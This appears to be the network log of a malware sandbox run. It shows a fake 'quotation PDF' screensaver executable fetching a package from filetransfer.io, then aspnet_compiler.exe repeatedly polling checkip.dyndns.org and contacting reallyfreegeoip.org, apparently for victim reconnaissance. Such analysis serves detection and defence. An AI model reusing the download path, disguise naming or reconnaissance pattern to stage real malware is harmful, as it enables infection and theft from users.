Nov 18, 2024 18:11:24.142570972 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.142623901 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.142632008 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.142838001 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.220165014 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.220189095 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.220283985 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.220300913 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.220531940 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.258266926 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.258289099 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.258339882 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.258356094 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.258392096 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.258404016 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.259157896 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.259176016 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.259229898 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.259239912 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.259290934 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.260215044 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.260231972 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.260299921 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.260308981 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.260432959 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.338668108 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.338690042 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.338787079 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.338824987 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.338998079 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.376638889 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.376657963 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.376724005 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.376743078 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.376795053 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.377136946 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.377202034 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.377202034 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.377265930 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.381762981 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:12:09.049751997 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:09.054636955 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:09.054737091 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:09.055074930 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:09.059904099 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:09.911705971 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:09.916616917 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:09.921538115 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:10.160227060 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:10.190522909 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.190553904 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:10.192037106 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.195003986 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.195019007 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:10.216082096 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:10.292041063 CET	49707	80	192.168.2.10	188.114.96.3
Nov 18, 2024 18:12:10.870230913 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:10.870309114 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.886434078 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.886450052 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:10.886852026 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:10.934324980 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.941905022 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:10.983339071 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:11.452377081 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:11.452558994 CET	443	49980	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:11.452662945 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:11.460355043 CET	49980	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:11.464024067 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:11.473191023 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:11.707504034 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:11.709882975 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:11.709947109 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:11.710036039 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:11.710383892 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:11.710411072 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:11.762545109 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.387851000 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:12.389957905 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:12.389986038 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:12.829566002 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:12.829663992 CET	443	49981	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:12.829741955 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:12.830415010 CET	49981	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:12.834501982 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.835726023 CET	49982	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.840101004 CET	80	49979	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:12.840410948 CET	49979	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.840760946 CET	80	49982	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:12.841202974 CET	49982	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.841202974 CET	49982	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:12.846179008 CET	80	49982	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:13.689192057 CET	80	49982	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:13.690613031 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:13.690665960 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:13.690762043 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:13.691129923 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:13.691145897 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:13.731332064 CET	49982	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:14.347964048 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:14.349529982 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:14.349554062 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:14.514028072 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:14.514097929 CET	443	49983	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:14.514204025 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:14.514859915 CET	49983	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:14.519859076 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:14.524892092 CET	80	49984	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:14.524991989 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:14.525172949 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:14.530041933 CET	80	49984	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:15.361280918 CET	80	49984	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:15.362407923 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:15.362432957 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:15.362498999 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:15.362814903 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:15.362826109 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:15.403069019 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.195950985 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:16.197452068 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:16.197468996 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:16.377109051 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:16.377239943 CET	443	49985	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:16.377474070 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:16.377845049 CET	49985	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:16.381421089 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.382594109 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.387315989 CET	80	49984	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:16.387401104 CET	49984	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.388048887 CET	80	49986	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:16.388114929 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.388256073 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:16.395026922 CET	80	49986	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:17.224740028 CET	80	49986	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:17.226207972 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:17.226233006 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:17.226363897 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:17.226629019 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:17.226644993 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:17.278090954 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:17.875250101 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:17.876576900 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:17.876589060 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:18.090547085 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:18.090677977 CET	443	49987	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:18.090759039 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:18.091358900 CET	49987	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:18.095196009 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:18.096498966 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:18.100532055 CET	80	49986	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:18.100627899 CET	49986	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:18.101454973 CET	80	49988	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:18.101545095 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:18.101722956 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:18.106547117 CET	80	49988	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:18.932975054 CET	80	49988	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:18.934739113 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:18.934772968 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:18.934844971 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:18.935100079 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:18.935115099 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:18.981420040 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.639117956 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:19.640505075 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:19.640542030 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:19.891479969 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:19.891602993 CET	443	49989	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:19.891700983 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:19.892178059 CET	49989	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:19.895585060 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.896668911 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.901187897 CET	80	49988	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:19.901268959 CET	49988	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.901581049 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:19.901700020 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.901814938 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:19.906820059 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:21.637130022 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:21.637650013 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:21.637758017 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:21.637759924 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:21.637824059 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:21.638437986 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:21.638528109 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:21.638662100 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:21.638727903 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:21.638799906 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:21.639074087 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:21.639086962 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:22.268919945 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:22.270540953 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:22.270581961 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:22.420511007 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:22.420603991 CET	443	49991	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:22.420691967 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:22.421286106 CET	49991	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:22.424850941 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:22.426285028 CET	49992	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:22.430366993 CET	80	49990	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:22.430475950 CET	49990	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:22.431142092 CET	80	49992	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:22.431348085 CET	49992	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:22.431581974 CET	49992	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:22.436584949 CET	80	49992	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:23.284288883 CET	80	49992	193.122.6.168	192.168.2.10
Nov 18, 2024 18:12:23.285940886 CET	49993	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:23.286003113 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:23.286168098 CET	49993	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:23.286425114 CET	49993	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:23.286451101 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:23.325038910 CET	49992	80	192.168.2.10	193.122.6.168
Nov 18, 2024 18:12:23.930236101 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:23.931818008 CET	49993	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:23.931843042 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:24.100735903 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:24.100830078 CET	443	49993	188.114.97.3	192.168.2.10
Nov 18, 2024 18:12:24.100898027 CET	49993	443	192.168.2.10	188.114.97.3
Nov 18, 2024 18:12:24.101702929 CET	49993	443	192.168.2.10	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:11:07.376667023 CET	61859	53	192.168.2.10	1.1.1.1
Nov 18, 2024 18:11:07.386363983 CET	53	61859	1.1.1.1	192.168.2.10
Nov 18, 2024 18:11:10.122940063 CET	60203	53	192.168.2.10	1.1.1.1
Nov 18, 2024 18:11:10.134376049 CET	53	60203	1.1.1.1	192.168.2.10
Nov 18, 2024 18:12:09.035552979 CET	60282	53	192.168.2.10	1.1.1.1
Nov 18, 2024 18:12:09.042700052 CET	53	60282	1.1.1.1	192.168.2.10
Nov 18, 2024 18:12:10.181837082 CET	49952	53	192.168.2.10	1.1.1.1
Nov 18, 2024 18:12:10.189703941 CET	53	49952	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 18:11:07.376667023 CET	192.168.2.10	1.1.1.1	0x4f7e	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:11:10.122940063 CET	192.168.2.10	1.1.1.1	0x6327	Standard query (0)	s23.filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.035552979 CET	192.168.2.10	1.1.1.1	0xea81	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:10.181837082 CET	192.168.2.10	1.1.1.1	0x3aec	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 18:11:07.386363983 CET	1.1.1.1	192.168.2.10	0x4f7e	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:11:07.386363983 CET	1.1.1.1	192.168.2.10	0x4f7e	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:11:10.134376049 CET	1.1.1.1	192.168.2.10	0x6327	No error (0)	s23.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:11:10.134376049 CET	1.1.1.1	192.168.2.10	0x6327	No error (0)	s23.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:09.042700052 CET	1.1.1.1	192.168.2.10	0xea81	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:10.189703941 CET	1.1.1.1	192.168.2.10	0x3aec	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:12:10.189703941 CET	1.1.1.1	192.168.2.10	0x3aec	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s23.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	188.114.96.3	80	7628	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:11:07.403615952 CET	95	OUT	GET /data-package/Bh1Kj4RD/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Nov 18, 2024 18:11:08.328608990 CET	998	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 18 Nov 2024 17:11:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/Bh1Kj4RD/download cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKExv6tBKAxeqRXxgXAa8jrlR1VEyBQ9izQWl9ngZigQt3AsSNHowzbMTs3BUMIU%2BDIOgZnokEi18clBF2NcV8kBk4XJ%2FJtPxNKqZ%2BLZy0qvCiJwt%2B2NZLBeZ4Y9%2B2d0le4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4993f2c8d2e750-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49979	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:09.055074930 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:12:09.911705971 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 27eea09b76d291f851db5892cd7cd7b9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:12:09.916616917 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:12:10.160227060 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d2b12de2cdb31d4bc7d4071a35a13be7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:12:11.464024067 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:12:11.707504034 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:12:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 90108b563c1597d6d45ef8800e7524f9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49982	193.122.6.168	80	6180	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:12:12.841202974 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
